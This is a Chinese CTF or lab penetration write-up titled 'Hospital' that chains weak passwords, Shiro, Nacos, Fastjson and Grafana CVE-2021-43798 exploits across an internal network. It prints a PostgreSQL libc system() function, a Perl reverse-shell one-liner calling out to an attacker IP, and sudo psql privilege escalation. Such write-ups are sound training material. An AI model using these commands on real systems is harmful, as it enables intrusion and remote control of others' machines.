Hospital

image-20260318163111190

弱口令成功登录admin,但没发现什么利用点

扫出来存在heapdump.下载一下

image-20260318163210090

用JdumpSpider发现shiro漏洞

image-20260318163430063

注入内存马

image-20260318163727501

suid发现有vim.basic

image-20260318165122332

本来想写/etc/passwd,但冰蝎vim.basic命令半天加载不出来,只能将就一下直接读flag了

image-20260318170005142

内网扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.6:8848 open
172.30.12.6:445 open
172.30.12.236:8009 open
172.30.12.5:22 open
[*] NetInfo 
[*]172.30.12.6
   [->]Server02
   [->]172.30.12.6
[*] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[*] WebTitle http://172.30.12.5:8080   code:302 len:0      title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=05EEB15060E852B3E26D7F2B2A5E641C
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=05EEB15060E852B3E26D7F2B2A5E641C code:200 len:2005   title:医疗管理后台
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964   title:医院后台管理平台
[*] WebTitle http://172.30.12.6:8848   code:404 len:431    title:HTTP Status 404 – Not Found
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos 
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file 
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass 

1
2
3
172.30.12.5 拿下
172.30.12.6 WORKGROUP\SERVER02
172.30.12.236

http://172.30.12.6:8848/nacos/#/成功用nacos默认口令登录

发现了数据库用户密码但是navicat登不进去,还发现存在redis服务但是redis-cli连不上

image-20260318172214647

用nacos漏洞工具注一下内存马

image-20260318174047184

新建一下用户

image-20260318174354630

image-20260318174708322

用猕猴桃抓一下哈希,发现是工作组抓不到域用户的哈希,还是得从236:8080入手

抓包发现是json发送,怀疑是fastjson,测试一下

image-20260318181210496

image-20260318181254085

真是

我日ONEFOX工具箱里的fastjsonscan插件有问题,搞了两个小时才发现是它给的jar包的问题,自己从网上新下了一个fastjsonscan又发现这个新插件扫不出洞,fushuling师傅文章给的插件一下就好了

image-20260318200353472

因为是root权限,直接写入ssh公钥

因为web3不出网,所以利用web1传工具

扫出来两张网卡

image-20260318201854376

因为在web1上搭建的代理跟这个不是同一个网段,所以无法访问

在web1上开frps,web3上开fprc

image-20260318203953740

image-20260318204007761

成功访问,存在CVE-2021-43798任意文件读取

image-20260318204619264

利用CVE-2021-43798获取数据库文件,使用工具grafanaExp获取到数据库密码为Postgres@123

改root用户密码

image-20260318211827467

1
2
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
select system('curl 172.30.54.179');

image-20260318212025400

1
select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

image-20260318212435849

没权限要提权

sudo -l有psql命令

image-20260318212555123

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’进入交互式shell

sudo /usr/local/postgresql/bin/psql进行提权,在这里的root密码刚改的123456

然后!/bin/bash

cat flag就行

image-20260318213449220

About this Post

This post is written by DashingBug, licensed under CC BY-NC 4.0.